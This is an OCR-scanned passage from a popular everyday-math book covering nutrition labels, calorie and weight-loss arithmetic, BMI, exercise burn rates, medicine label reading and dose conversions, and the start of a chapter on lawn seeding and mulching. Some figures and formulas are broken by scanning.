Cutting calories to meet your weight goals 
Figuring your ideal weight and body mass index (BMI) 
Determining the burn rate of common activities 
Taking and giving accurate medication dosages 


our health is important, and few people would dispute that 

statement. If you’re healthy, you can take advantage of all of 
life’s opportunities. If you’re not healthy, you have some rough 
sailing ahead. 


What is “health,” anyway? The World Health Organization (WHO) 
has defined health as “a state of complete physical, mental, and 
social well-being and not merely the absence of disease or infirmity. 
Ho! That’s a big order to fill! 


” 


Real-life math can help you get healthy and stay healthy. If you 
apply some basic arithmetic to the components of health — 
nutrition, weight management, exercise, and taking medications — 
you'll know whether you’re on track or need to tweak your 
strategy a bit. In this chapter, you look at key elements of health 
and the accompanying math. 


Figuring Vour Nutritional Needs 


To be at optimum health, you need to make sure you're getting the 
right amount of nutrients in what you eat. Each nutrient (protein, 
carbohydrates, and fat, as well as vitamins and minerals) has a 
positive impact. Of course, nutrients satisfy your appetite and give 
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you caloric energy, but they do a lot more than that. Here’s a quick 
rundown of the good stuff nutrients do for your body: 


Protein: Proteins are one of the building blocks of body 
tissue. Proteins maintain cell shape and are part of organized 
tissues (otherwise, you’d look like an amoeba). They are also 
needed for cell adhesion (think of white blood cells sticking 
to blood vessel walls to fight infection) and just plain growth. 
Proteins can come from animal sources (beef, chicken, fish, 
eggs, milk, and cheese) or vegetable sources (beans, quinoa, 
soy, lentils, and tempeh). 


Proteins should make up about 10 percent of your daily food 
intake. That’s about 200 calories per day for a 2,000 calorie 
per day diet. 


Carbohydrates: Carbs are a great source of energy. They’re 
also prominent in raising blood glucose levels. The complex 
carbohydrate world is where you find pasta, bread, and cereals. 
The simple carbohydrate world is the home of sugar. 


Complex carbs should make up about 60 percent of your 
daily calorie intake. Complex carbs should make up most of 
your daily carbohydrate intake. Simple carbs should be an 
occasional treat. 


Fats: Fat provides energy, helps your body absorb certain 
nutrients, and keeps your cells healthy. Fats can come from 
animals (butter and lard) or vegetables (peanut oil, coconut 
oil, and the ever-popular olive oil). There are saturated fats, 
unsaturated fats, and monounsaturated fats (of which olive oil 
is best known). Trans fats have a bad reputation because they 
increase your risk of getting coronary heart disease. 


A healthy diet includes a little less that 30 percent fat. 


Vitamins and minerals: Called micronutrients because your 
body needs small amounts, this class of nutrient includes 
vitamin A, the B vitamins, sodium, magnesium, and a whole 
host of others. Each has a particular function, but all of them 
together help ensure your health and well-being. To find out 
how much of each of these nutrients you need daily, head to 
the later section “Following the recommended daily allowance.” 


Proper nutrition requires that you take in the basic nutrients, but 
you also need to consume dietary fiber and micronutrients. And 
that’s basically all there is to it. In the following sections, I tell you 
how to use real-life math to make sure you're getting the nutrients 
you need. 
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Read the label, Mabel: 
Nutrition facts 


Many countries (including the United States, Canada, Australia, 
New Zealand, and those in the European Union) require labeling 
on packaged food. This label (called a Nutrition Facts label in the 
United States) is filled with useful information. 


Learn to read the food label. You can use the information to see 
how many calories and which and how much of key nutrients 
(protein, fats, and carbohydrates) and micronutrients (vitamins 
and minerals) the product has. Figure 7-1 shows two nutrition 
labels for sausages. 


Nutrition Facts | Nutrition Facts 


Serving Size 2 oz (56g) Serving Size 1 Link (71g) 
Servings Per Container about 7 Servings Per Container 4 
ee 
Amount Per Serving Amount Per Serving 
Calories 170 Calories from Fat 140 Calories 200 Calories from Fat 160 
% Daily Value* % Daily Value* 
Total Fat 15g 23% Total Fat 18g 28% 
Saturated Fat 5g 26% Saturated Fat 6g 30% 
Trans Fat 0g Cholesterol 45mg 15% 
Cholesterol 35mg 12% Sodium 630mg 26% 
Sodium 570mg 24% Total Carbohydrate 1g 1% 
Total Carbohydrate 2g 1% Dietary Fiber 0g 0% 
Dietary Fiber 0g 0% Sugars 1g 
Sugars less than 1g Protein 10g 
Protein 7g Vitamin A 0% e Vitamin C 0% 
Vitamin A 0% œ Vitamin C 0% Calcium 0% œ Iron 4% 
Calcium 0% © _Iron2% *Percent Daily Values (DV) are based on a 2,000 
"Percent aly Vaos are based on a 200 | | palori det four Daly Veles may ge Poher or 
ed Calories: 2,000 2,500 
INGREDIENTS: PORK, WATER AND LESS Total Fat Less than 65g 80g 
WAN 2 OF THE FOLLOWING: SALL: | Vchaleetral” Laas man Sty” a 
CORN SYRUP, DEXTROSE, SPICES, BEEF, Sodium Lege than Pantry zatona 
SAQA PNDARFATEMODAFOQWAL AA | | Total Carbohydrate 300g 375g 
Dietary Fiber 25g 30g 


INGREDIENTS: Pork, Water, Beer, With 2% 

or less of the following: Sea Salt, Sugar, 

Natural Spices (including black pepper, 
it e d a 


Illustration by Wiley, Composition Services Graphics 


Figure 7-1: Reading nutrition labels. 


The label does most of the real-life math for you. Among other 
things, the “% Daily Value” column shows what portion of 
recommended daily values the item contains for a 2,000- to 
2,500-calorie-a-day diet. (Look at the footnote on the label to see 
the daily calorie intake.) 
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Pay particular attention to the following information: 


Serving size and number of servings in a package: This info 
tells you how large (or small) a serving is. Pay close attention 
because all the other information on the label is based on a 
single serving. 


Calories per serving: When you look at the calories per 
serving amount, pay attention to the number of servings in 
the package or the serving size. Many packages that appear to 
be single servings (like a 16-ounce bottle of soda, for example) 
actually have multiple servings in them. 


You will be shocked (shocked!) to learn that some product 
manufacturers play fast and loose with portion sizes to make 
their products seem less calorie-laden. Take a look at Figure 7-1 
again. The right-hand label is for a package containing 4 brat- 
wursts. The links are 5 inches long and weigh 2.5 ounces each. 
The serving size is stated as “1 link” — pretty straightforward. 
The left-hand label provides info for a package that contains 
four 8-inch sausages. Each sausage weighs 7 ounces. But 

the serving size is 2 ounces! In other words, a single serving 

is 2/7 of a whole sausage, which works out to be a 2.29-inch 
piece of sausage. This is where most people trip up (and who 
can blame them?) in accurately figuring how many calories or 
nutrients they’re really getting. 


a? When what appears to be a single-serving package contains 
multiple servings, you can determine the total calories by 
multiplying the “Amount Per Serving” calories by the 
“Servings Per Container” number. And here’s one more tip. 
That standard serving size for a soft drink is 8 fluid ounces, no 
matter what the label says. 


The percentage of the macro- and micronutrients a serving 
gives you. With this info, you can determine where the 
food falls on the “how healthy is it for you” scale. The percent- 
ages tell you if you’re headed for trouble in the world of pro- 
tein and fat, but especially fat. As a general rule, food high in 
saturated fats, cholesterol, and sodium are less healthy. 
Y If you ever want to get a real handle on calories and serving sizes, 
buy a digital kitchen scale. The scale is great fun, and you can 
easily weigh out any quantity of any food you want to eat. 
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Your own personal “best” foods list 


Here's some general advice that you can build on to make your own personal list 
of “best” foods: 


Be suspicion of all processed food with added sugar (spaghetti sauce, for 
example), as it's not needed. The “factory food” industry runs, it seems, on 
adding sugar in the form of high-fructose corn syrup. And while l'm on the 
subject of sugar, the best sweetener is real sugar: sucrose in granulated sugar, 
fructose and glucose in honey, and fructose in fresh fruit. 


Be suspicious of any processed food loaded with sodium. Your doctor may 
say you shouldn't add salt to your meals, but the real way to reduce sodium is 
to avoid foods with hidden sodium. 


Beware of high fat content — especially saturated fat. The best fats are the 
polyunsaturated fat in vegetable oil and the monounsaturated fat in olive oil. 


Take a tip from Julia Child. When you want butter, use rea/ butter, not mar- 
garine or some compromise. And unsalted butter is better. True, butter is 100 
percent fat, and most of it is saturated fat, but | agree with Julia that nothing 
tastes better. Just go easy on the quantity. 


Beware of empty calories. These are foods that have a lot of calories but don't 
add a lot of nutrition. The list of empty-calorie foods includes candy, cookies, 
ice cream, and sugary beverages. To this list, add highly refined grains (white 
bread and white rice) and then put in hamburgers, hot dogs, French fries, fried 
chicken, and pizza. Don't forget alcoholic beverages. These foods aren't with- 
out some nutritional value, but they're best known for supplying lots of calories 
without supplying lots of nutrients. That's a surefire formula for weight gain. It's 
okay to eat them, but be careful. 


Figuring out your ideal 
daily calorie intake 


Your ideal daily caloric intake varies with your age, activity level, 
and other factors. Table 7-1 lists ages and the average calorie 
intake for each group (keep in mind that what you need may vary). 
These numbers come from the U. S. Department of Agriculture and 
assume an activity level of 30 minutes or less per day. (That low 
activity, sadly, seems to be the trend in America.) 
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Table 7-1 Daily Calorie Intake, by Age 
Category Daily Calories 
Children (2-3 years) 1,000 
Children (4-8 years) 1,200—1,400 
Girls (9-13 years) 1,600 

Boys (9-13 years) 1,800 

Girls (14-18 years) 1,800 

Boys (14-18 years) 2,200 
Females (19-30 years) 2,000 
Males (19-30 years) 2,400 
Females (31-50 years) 1,800 
Males (31-50 years) 2,200 
Females (51+ years) 1,600 
Males (51+ years) 2,000 


As I note earlier, how many calories you should eat in a day may be 
different from any chart. To find your daily intake, visit an Internet 
calculator, such as http: //www. freedieting.com/tools/ 
calorie_calculator.htm. At the site, simply make entries for 
your age, gender, weight, height, and exercise level to get your 
results. My result is 1,834 calories per day, which is lower than the 
number Table 7-1 gives me (2,000 calories). 


Following the recommended 
daily allowance 


The Dietary Reference Intake (DRI) is a set of recommendations 
from the U.S. National Academy of Sciences that lists about 

29 micronutrients, ranging from vitamin A to zinc, and tells you 
how much of each you need daily. Both the U.S. and Canada use 
the DRI. If you’re meeting the DRI recommendations, you’re 
probably eating healthy. 
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BLSTy, 
s ate * You may know the DRI by another acronym: RDA, which stands for 
wu ae ) Recommended Daily Allowance. Same idea and essentially the same 
yi list with a different name. 


Your everyday-math task is to be familiar with the list and apply it 
when you’re reading food labels. It’s an analysis and judgment job. 
(After all, you can’t be doing arithmetic all the time.) You can find 
the list online at in many places. The table at the USDA website 

is too hard to read; instead, visit http: //en.wikipedia.org/ 
wiki/Dietary_Reference_Intake. 


Calculating Calories 


The food calorie (also known as the calorie or the Rcal) is the 
measure of the energy in the food you eat, and it comes from 

the protein, carbohydrates, fat, and alcohol in a food item. That 
energy, when released, powers your body and your brain. It’s the 
cornerstone of physical health. 


Counting calories in your food 


You know that different foods contain different amounts of calo- 
ries. For example, an ordinary slice of bacon has a lot of calories 
(about 43) and a medium cucumber has few calories (about 24). 


Calorie math is based on what you eat and how much you eat. It’s 
a simple calculation: total calories = number of servings x calories 
per serving. A thick strip of bacon, for example, has 61 calories, 
mostly from fat. If you have 4 strips of bacon at breakfast, that’s 
244 calories. If you love bacon and eat a pound at a time, you’ve 
consumed 2,440 calories. 


To find the calories in a complete meal, you determine the number 
of calories for each item and then add them all together. 


Here are several pointers to keep in mind as you calculate the 
number of calories you’re eating: 


1” For many foods, you can easily determine calories by reading 
food labels. But that doesn’t work in the meat department at 
your supermarket. When it comes to beef, chicken, and fish, you 
have to do some calculating or look up the food on the Internet. 


11 
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Honey, does this country make 
my butt look big? 


The United States leads the world in obesity. Some health experts call it an 
epidemic, and the problem applies to children as well as adults. There are other 
“overweight countries,” too. 


The following table compares obesity in selected countries. Use your analysis skills 
to draw conclusions. 


Country Obesity Rank Percent Obese 
U.S. 1 30.60 

Mexico 2 24.20 
UK/Wales 3 23.00 

Germany 14 12.90 

France 23 9.40 

Italy 25 8.60 


By the way, in the U.S. Mississippi leads with 34.9 percent obesity in adults, and 
Colorado is at the tail end, with 20.7 percent obesity in adults. 


Who cares? You should, because obesity contributes to all kinds of illness, 
including coronary heart disease and diabetes. First you get fat; then you get dead. 
(And this comes from an author who is overweight and fighting it every day.) 


Math alert! Statistics are measurements made on large populations. The numbers 
for countries or states don’t account for individual height, health, eating disorders, 
or genetics. See Chapter 3 for more on statistics. 


<r 


I found the world’s best calorie and nutrition information at 
http://nutritiondata.self.com. The site has thousands 
of items (including fast food items) and allows you to build 
your own personal list of foods you frequently eat. 


You can find calorie charts on the Internet that list the 
number of calories in a whole range of foods. Just do some 
multiplication to convert the amount of food shown in a chart 
to the amount you really eat. 


Pay attention to serving sizes. If a standard serving of ice 
cream is a half cup but you fill a cereal bowl, you’re eating 
more than a single serving. Adjust your “Number of servings” 
accordingly to get an accurate calorie count. 
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Calorie algebra 


When you eat, you're taking in nutrients in the form of protein, carbohydrates, and 
fat. Alcohol has calories but isn't accepted as a nutrient. Food also includes micro- 
nutrients. See the section “What's in the diet?” for details on those. The different 
nutrients (and alcohol) have a different number of calories: 


1# Proteins: About 4 calories per gram. 
Carbohydrates: About 4 calories per gram. 
1# Fats: About 9 calories per gram. 

Alcohol: About 7 calories per gram. 


Don't let calorie counts baffle you. For example, a 4-ounce steak has more calo- 
ries than 4 ounces worth of protein does. Why? Because a steak isn’t all protein. 
A steak has plenty of fat, and that sends the cal count up. You can find out more 
about nutrients and how to make sure you get enough of them in the earlier section 
“Figuring Your Nutritional Needs.” 


Managing your weight with math 


Your body knows how many calories it needs in a day, and it will 
tell you. How? By gaining or losing weight. If you’re getting too 
many calories, your body stores the excess calories as body fat 
(“Once on the lips; forever on the hips”), and you gain weight. If 
you're getting too few calories, your body uses body fat to get the 
energy it needs, and you lose weight. 


To figure out how many calories per day you need, use an Internet 
calorie calculator. Visit http: //www. freedieting.com/tools/ 
calorie_calculator.htm 


Once you know how many calories your body needs in a day to 
maintain your current weight, you can decrease that number to 
lose weight or increase it to gain weight. 


Of course, if your goal is to lose weight, you want do so safely, and 
that means losing no more than 1 to 2 pounds in a week. Here’s 
what you need to know to manage your rate of weight loss: 


One pound (454 grams) of body fat stores about 3,500 calories. 


To lose 1 pound a week, you need to reduce the total number 
of calories you eat in a week by 3,500. To lose 2 pounds a 
week, reduce your weekly calorie intake by 7,000 calories. 
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To make your weekly weight loss goal, divide the number of 
fewer calories you need to eat in a week by 7, the number of 
days in the week. This tells you how many fewer calories you 
need to eat each day. 


reduced calories per day = reduced calories per week 


reduced calories per day = 3,50 


reduced calories per day = 500 


To lose 1 pound a week, you need to eat 500 fewer calories in 
a day. To lose 2 pounds, you need to eat 1,000 fewer calories 
a day. 


If you find yourself facing a class reunion or wedding a few pounds 
heavier than you’d like to be, you can figure how many pounds you 
need to lose in the time left by dividing the weight you want to lose 
by the number of weeks you have to lose it. 


pounds to lose 
number of weeks 


weight loss per week = 10 


weight loss per week = 


weight loss per week = 2 


Be careful about crash diets. Your doctor won’t like the idea, and 
many people who lose weight fast gain it back fast. Losing several 
pounds slowly is more sensible than losing them quickly. If you 
know you have an event coming up that you want to look your best 
for — and if “looking your best” means losing weight — start early 
enough that you can reach your goal without going on a crash diet. 
As I mention earlier, 1 to 2 pounds a week is a safe rate of weight 
loss. 


Comparing your current weight 
to your goal weight 


Weighing too little isn’t good, but the vast majority of people weigh 
too much. If you’re in the majority, you’re probably trying to shed 
a few pounds. If you want to get down to your ideal weight, you 
need to know two things: 


Your ideal weight: Your ideal weight, or goal weight, is a 
generalized number that depends on your gender, height, and 
frame size. You can consult a chart or an Internet calculator. 
(You'll find a good calculator at http: //www.halls.md/ 
ideal-weight/body.htm.) 
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When you find your goal weight, don’t panic! All goal weight 
charts and calculators will make you feel as though they’re 
written for half-starved supermodels. Talk with your doctor. 
The doctor likes lean patients (because they have fewer 
health problems), but he or she won’t suggest an insane goal 
weight. 


/ Your current weight: Oh, no! Not the scale! Yes, the scale. 
A good scale tells you how much you weigh. No math is 
involved; you merely have to read numbers correctly. So step 
on the darned thing and read your weight. (By the way, if 
possible, get a nice digital scale; many of them are accurate 
within 0.2 pound.) 


Staying on point 


Weight Watchers is a famous program that calculates food in “points.” You're 
allowed so many points per day, plus some additional weekly points. The point 
method is intended to be easier than counting calories, and the program is intended 
to promote good eating habits and more exercise. 


Point values are essentially designed to produce a 1,000 calorie daily deficit in your 
eating (7,000 calories per week), whichis likely to result in a weight loss of 2 pounds 
per week (see the preceding section). 


Here are the key point calculations: 


1# The points a food offers are based on a fairly complex proprietary formula, so 
you rely on Internet listings and the numbers on the branded food items the 
program sells in stores. (The point values have quite a range. For example, a 
banana split is 19 points, while bamboo shoots are 0 points.) 


Calculating the points you're allowed requires the use of official calculators, 
but you can find other point calculators on the Internet. You enter your age, 
weight, height, exercise level, and number of pounds you want to lose. 
The calculator assigns you 26-71 points to consume each day. You also get 49 
additional “weekly points” to use each week. 


Your daily calculations are simple. When you know your daily and weekly points, 
just write down the point values for what you eat and add ‘em up. Compare the 
points for what you eat to the points you are allowed to see whether you're 
staying on track or veering off the path, so to speak. 


Remember: Point counting and calorie counting have limits. They don't indicate 
nutritional value. Develop healthy eating habits. 
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With these two numbers (current weight and goal weight), you 
simply subtract to see how much you need to lose (or gain). When 
your current weight is greater than your goal weight, use this for- 
mula (in this example, the current weight is 189 pounds and the 
goal weight is 160 pounds): 

amount of weight to lose = current weight — goal weight 

amount of weight to lose = 189 — 160 

amount of weight to lose = 29 


When your current weight is less than your goal weight, you use 
this formula (here, current weigh tis 138 and goal weight is 150): 


amount of weight to gain = goal weight — current weight 
amount of weight to gain = 150-138 
amount of weight to gain = 12 


In the first case, you might consider losing about 29 pounds. In the 
second case, think about gaining 12 pounds. 


Diet versus dieting 


Your dietis a broad term for everything you eat. It’s largely influenced by culture. 
Your diet is a composite of your individual choices, too. You might choose a vegan 
diet and eat no dairy or meat, nor anything produced by an animal (like honey); a 
pescetarian diet , which includes fish but no meat; an ovo-lacto vegetarian diet, in 
which you eat eggs and diary, but no meat; or any number of other specialized diets. 


But for most of history, people have eaten what food they could get. The result 
has been a number of reasonably healthy nations. For example, many people in 
Azerbaijan (a relatively poor country) live to 100 or older, possibly because they eat 
a lot of yogurt, a lot of vegetables, and relatively little meat. 


Dieting is different. Dieting is a conscious plan to gain weight (sometimes) or lose 
weight (usually). 
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Calculating BMI 


The body mass index (BMI), a measurement that’s been around 
for over 150 years, is an approximation of how much body fat you 
have. Your BMI is a really handy number, and it’s easy to calculate. 
The basic idea is that, if you have a high BMI, you’re carrying 
around too much fat. A BMI over 30 means you fit the definition of 
obese. 


To calculate your BMI, you divide your weight by the square of 
your height. 


To calculate BMI with metric units: 


BMI= weight in kg 
(height in meters)? 
92.08 
BMI 
(1.752) 
_ 92.08 
BMI = 3069 
BMI = 30.00 


In American units, the formula is a little different, because it must 
factor in metric-to-American conversions. 


weight in lbs 


BMI= > 
(height in inches) 


(703) 


203 
BMI = 703 


_ 203 
BMI = 772, (703) 


BMI = 29.97 


ay? Don’t want to do the math yourself? You can go online and get the 
number from a BMI calculator or BMI charts (easy math, right?). 
Visit http: //www.webmd.com/diet/calc-bmi-plus. The 
calculator not only gives you your BMI, but it also gives youa 
number for your body shape (waist-to-height ratio). 
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Exercise Math 


Exercise? What? I'd rather not. But some people — maybe even 
you — love it. Some, like my doctor (a mountain biker), even insist 
that exercise can become a wonderful addiction. 


Doctors recommend exercise to help almost every health condition: 
obesity, diabetes, coronary heart disease, and osteoporosis, to name 
a few. And many people exercise to help lose weight. The object is to 
expend calories, that is, to “burn off” stored body fat in an activity. 


These METs won’t win a pennant: 
Metabolic equivalent of task 


The metabolic equivalent of task (MET) is a relative measure of the 
energy cost of physical activity, which is a fancy way of saying it lets 
you compare the burn rate of different forms of exercise. Figure 7-2 
shows the relative levels of effort of different kinds of exercise. 


Activity 

Watching television 
Desk work 

Walking (1.7 mph) 
Walking (2.5 mph) 
Walking (3.0 mph) 
Walking (3.4 mph) 
Bicycling 
Stationary bicycling 
Jogging 


Illustration by Wiley, Composition Services Graphics 


Figure 7-2: MET chart for different activities. 


The higher the MET value, the more energy (and therefore more 
calories) an exercise burns. From Figure 7-2, for example, you see 
that jogging expends 7 times the energy that watching television 
does. The “exercise value” of a MET chart is that you can find forms 
of exercise with higher burn rates (for example, stationary bicycling 
at the gym). The “monetary value” of a MET is that you can see what 
exercise is low-cost or no-cost (for example, walking and jogging). 


The actual burn rate of any particular activity varies from person 
to person and depends on your current weight and fitness level, 
but the MET is relative to all the forms of exercise you do. No 
matter what your age or weight, you'll still burn more calories 
walking than watching TV. 
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Aerobic versus anaerobic exercise 


You don’t need to be a doctor of sports medicine to know about the two broad 
categories of exercise. Aerobic exercise consists of activities with repetitious 
movements over a relatively long period of time. Aerobic exercise is great for your 
respiration and heart function, and includes the treadmill and step aerobics. 


Anerobic exercise consists of activities that require extreme expenditures of 
energy over a relatively short period of time. Anaerobic exercise builds strength 
and muscle mass, and includes weight training (also known as “pumping iron”). 


Down at the gymnasium, you can take in both kinds of exercise. 


Figuring an activity’s 
calorie burn rate 


While MET values show the relative intensity of different forms 

of exercise, you will find greater value in knowing the absolute 
number of calories that are “burned.” How many calories you 
expend per hour (called the burn rate) varies, based on your body 
weight. Figure 7-3 shows a sampling of calories used in 1 hour of 
cycling for people of different weights. 


Activity (1 hour) 130 Ib} 155 Ib} 180 Ib 
Cycling, <10 mph, leisure bicycling 236| 281 
Cycling, 14-15.9 mph, vigorous 590; 704 
Stationary cycling, light 325 
Stationary cycling, very vigorous 738 


Illustration by Wiley, Composition Services Graphics 


Figure 7-3: Burn rates vary, based on intensity of the activity and body weight. 


You can find such charts on the Internet. To see a lengthy list of 
activities, visit http: //www.nutristrategy.com/activity 
list4.htm; then just find the activity you like and find your 
weight. Write down the “calories per hour” number and figure how 
much time you will do the activity. 


As helpful as the such lists are, even more helpful are calculators 
that let you enter your data — weight, intensity level of activity, 
and amount of time you performed the activity — and then pro- 
duce a report with the number of calories burned. Visit http: // 
www.healthstatus.com/calculate/cbc and give it a try. 
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In the following list, I give approximate burn rates for a few activities: 


Walking on a treadmill: Walking on a treadmill not only 
improves fitness, but burns calories of body fat. The exact 
burn rate depends on your weight and metabolism. A person 
weighing 180 pounds treading at 4 miles per hour for 
60 minutes burns about 421 calories. 


Lifting weights: Aside from the other benefits of weight training 
(building muscle or firming muscle), a 180-pound person 
lifting weights for 60 minutes burns 281 calories. 


1# Sleeping: You burn calories even while you're sleeping or 
resting. (Is that great news, or what?) The number of calories 
you expend depends on your weight and how long you sleep. 
For example, a 150-pound person sleeping for 8 hours burns 
504 calories! That’s 63 calories per hour. 


Your friend, the pedometer 


A pedometer is a small device that counts the number of steps you take when 
you walk. Everybody's step is a little different, so you do an initial calibration that 
enables the device to accurately “know” the length of your step. This formula is 


step length = known distance + number of steps 


You set up for conversion between your step (measured in feet) and walking dis- 
tance (measured in miles) by walking a known distance, such as 100 feet. You 
divide 100 by the number of steps on the pedometer to determine your step length 
(feet per step). 


The first pedometers were mechanical. You attached the meter to your waist, and 
when you took a step, the counter registered it. You then later converted the count 
into miles “manually.” 


Say your step is about 3 feet. With the classic pedometer, you would later convert 
using the formula 


miles = (number of steps + step length) = 5,280 


Modern pedometers have silicon chips and store the initial calibration, so they do 
mileage calculations for you automatically. 


Nowadays, you can get a free smartphone pedometer app that does everything. 
The app stores distance, time, speed, and calories burned. In addition (and this is 
really cool), the app uses the phone’s GPS feature to show you a map of where you 
just walked. A typical app is “Pedometer FREE,” available at Apple’s iTunes Store, 
and there are similar apps at the Android store. 
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Being the Doctor at Home 


When your spouse, your kid, an older relative, or a close friend 
gets sick, who they gonna call? Probably you. Acting out the role of 
doctor and dispensing medication at home requires great care and 
some easy math. The key techniques are to understand medication 
labels and to dispense the medications correctly. 


Understanding medicine labels 


Prescription and non-prescription medications have labels, which 
tell you a lot about the meds. These labels aren’t really complicated, 
but at first they may seem so, because they contain so much 
legally required information, some of which looks to be in code. 
Figure 7-4 shows a typical medicine label. 


BARRY SCHOENBORN 
AMLODIPINE TAB 5MG 


MRF: GREENSTONE 
TAKE 1 TABLET ONCE DAILY 


WHITE 
OCTAGONAL 
G 1539/5 


CAUTION: Federal law prohibits the transfer of the 


Illustration by Wiley, 
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Figure 7-4: A typical medicine label. 


The vast majority of medications come in the form of tablets (tabs) 
and capsules (caps). That term will be on the bottle. 


The important information on the label is: 


Name: The brand name or generic name of the drug. 


Amount of the active ingredient: This info is usually shown 
in milligrams (mg): For example, aspirin comes in 325 mg 
tablets for adults and 81 mg tablets for children. Occasionally, 
the active ingredient is noted in micrograms (mcg). 


Dosing: This info tells you how much of the medication to 
take and with what frequency. For example, “1 tablet 4 times 
daily.” 
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Other instructions: If the medication should be taken at a 
particular time (morning, for example, or with food), that info 
will be on the label as well. 


Other useful stuff: The label also includes the manufacturer’s 
name, expiration date, and pharmacy name. 


In Figure 7-4, you see that the drug is amlodipine, the dosage is 
5 mg, and the patient should take 1 tablet per day. 


The entirety of real-life math for tablets and capsules is to read the 
label, count the tablets in a single dose, and count the number of 
times the med has been given in a day. The math seems simple, yet 
it’s vital. 


Splitting a tablet is okay, if the tablet has a score line down the 
middle. The score line lets you divide the tab evenly. Use a little 
device called a pill splitter, which you can get at any drugstore. It’s 
not okay to split capsules. 


For good measure: Dispensing 
liquid medications 


Liquid medicines are dosed in milliliters (mL), teaspoons (tsp), 
and tablespoons (tbsp). To dispense them, you can use one of 
three low-cost tools: the medicine cup, the medicine dropper, and 
the measuring spoon (see Figure 7-5, which shows a medicine cup 
and a medicine dropper). 


The math is “measurement math” — that is, you must know how 
much medicine to dispense, based on the medication label, and 
then measure it accurately. 


3 

Tbsp -g tsp — 45 
2Thsp — 6 tsp — 30 ml 
\Tosp-3 tsp- 151m! 


\ 
”2Thsp—2 tsp - 10 M 
—1tsp 
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Figure 7-5: A medicine cup and medicine dropper. 
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Medicine cup: Essentially, a medicine cup is a shot glass with 
various accurate measurements on it. It doesn’t just allow for 
accurate measurement; it also does liquid volume conversions 
for you, showing the relationship between teaspoons, 
tablespoons, and milliliters. 


“ Medicine dropper: A medicine dropper is a glass or plastic 
tube that looks like an itty-bitty turkey baster, with a narrow 
end and a rubber “squeezer” at the other end. The barrel has 
milliliter (mL) marks. Often dispensing drops simply requires 
that you count the drops. This works for eye drops, ear drops, 
and nose drops. (As a bonus, it also works for food coloring 
when you’re dyeing Easter eggs.) If you have to dose more 
than a few drops, you fill the dropper to the correct mark (say 
0.5 mL or 1.0 mL), and then give it a gentle squeeze. 


Measuring spoons: Measuring spoons are precise measures, 
and you probably have a set in your kitchen. You typically 
use the teaspoon (5 mL) and tablespoon (15 mL) for dispensing 
meds. The best sets show both American units and metric 
units. 


Although your Gorham sterling silver teaspoons are beautiful (at 
about $220.00 each), they aren’t accurate for measuring medicines. 


Converting tsp and tbsp to mL 


Converting from teaspoons or tablespoons of liquid medications is 
easy if you know that 1 teaspoon equals 5 mL, 1 tablespoon equals 
3 teaspoons, and 1 fluid ounce equals 2 tablespoons. Like much of 

real-life math, the calculation is simple, and you can easily do it in 

your head. But if you don’t want to, here are the conversions: 


1 teaspoon (tsp) = 5 mL 
1 tablespoon (tbsp) = 3 teaspoons = 15 mL 
1 fluid ounce (fl oz) = 2 tablespoons = 30 mL 


Now you know what to do if you have to take 15 mL of cold medicine 
but have lost the measuring cup that so conveniently comes with 
the bottle. Just pull a tablespoon out of your kitchen drawer. 


Converting drops to fluid ounces 


Converting drops to fluid ounces and other units is a total waste of 
your math skills. And don’t bother consulting the Internet, where 
you'll find wild variations in equivalents, for example 480, 354.88, 
360.00, and 591.47 drops per fluid ounce. Smart math amounts to 
ignoring conversions you'll never use. 
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Re STyy, If you're in the hospital undergoing intravenous therapy (“on an 
ò Asc IV”), drops are more precise. The tubing is calibrated to deliver 
Fig V7 10, 15, or 20 drops/mL for adults. Children use different tubing 

that delivers 60 drops/mL. Don’t worry. Your nurse knows how it 
works. 


Chapter 8 


Putting Geometry to 
Work at Home 


In This Chapter 
Calculating areas and volumes for a variety of home projects 


Getting familiar with conversions so you purchase just what you need 


ou use math, especially geometry, around the house. All you 

need (for a start) is to know how to calculate the area of a 
rectangle (and maybe an occasional triangle or circle). I cover the 
general how-to’s for finding areas in Chapter 2. In this chapter, I show 
you how easy the math can be when you tackle some common 
home maintenance and improvement tasks. 


Note: Although I deal with specific scenarios in this chapter — like 
how to find the area of a flower bed so that you know how much 
mulch to buy — you can use the same techniques for other tasks. 
After all, the same principles — and math — apply whether you’re 
seeding a lawn or carpeting a room. 


Calculating Vour Way to a 
Better Lawn and Garden 


Taking care of the lawn, the flower beds, and the vegetable garden 
doesn’t necessarily have to be tedious; it can be fun. Mowing the 
lawn was a chore when I was a kid, but the results were satisfying. 
And working with flower beds and a vegetable garden gives most 
people a lot of satisfaction. 
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Aside from mowing, digging, and planting, a lot of work around 
the home deals with spreading materials around — be they paint, 
concrete, or mulch. Each process takes a little math. And let’s not 
forget that math can also answer the question that anyone who’s 
ever pushed a lawn mower on a hot summer afternoon has 
pondered: Just how big is this yard? 


Figuring how much seed you need 


A great way to improve your lawn is by over-seeding. While fertilizing 
is important, over-seeding is a super way to make your lawn thick 
and weed-free. The question is, how much seed do you need to get 
the lush lawn you’re striving for? 


To find the answer, calculate the area of your lawn and calculate 
how many pounds of seed you need. For this example, assume that 
the lawn is a rectangle on a typical city lot. 


Follow these steps: 


1. Calculate the area of the front lawn. 


A typical city lot width is 65 feet wide. If your house is set 
back 25 feet from the street, the front yard’s length is 25 
feet. Now you have the numbers you need to figure area, 
using this formula: area = length x width. 


area (square feet) = length (feet) x width (feet) 
area (square feet) = 25 x 65 
area (square feet) = 1,625 


The area of the front lawn is 1,625 square feet. (Head to 
Chapter 2 for general info on how to calculate the areas of 
other shapes.) 


2. Calculate number of pounds of seed you need. 


Seed companies make different claims about how much 
coverage a pound of seed gives you. It depends in part on 
the type of grass you want to plant. But for this example, 
suppose the seed company claims 600 square feet per 
pound. 


area of your lawn (square feet) 
area covered by 1 pound (square feet) 


seed needed (pounds) = 16° 


seed needed (pounds) = 2.7 


seed needed (pounds) = 
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The answer is about 2.7 pounds, so you'll need a three- 
pound box or bag of seed. 


Some landscapers suggest using the same amount of seed for 
over-seeding as you would for a new lawn. Also, these calculations 
work the same way for fertilizing or seeding a new lawn, and the 
area calculation is useful for the costly option of bringing in sod. 


Mulching math 


Your beds will look nice with a fresh batch of mulch. Mulching 
math is different from seeding math because mulching involves 
depth. Here’s how you determine how much mulch you need: 


1. Calculate the volume of the bed. 


To mulch a 4 foot by 10 foot bed to a depth of 2 inches, 
first find the volume in cubic feet. To do so, multiply the 
length x width x height. 


When you do calculations, you need to make sure that all 
the values are represented in the same units. In this example, 
you know that the bed is 4 feet by 10 feet, so you need to 
put the depth in feet, too. You may recall that 2 inches is 
2/12 (1/6) of a foot, which is also 0.167 feet. 


volume (cubic feet) = length (feet) x width (feet) x depth (feet) 
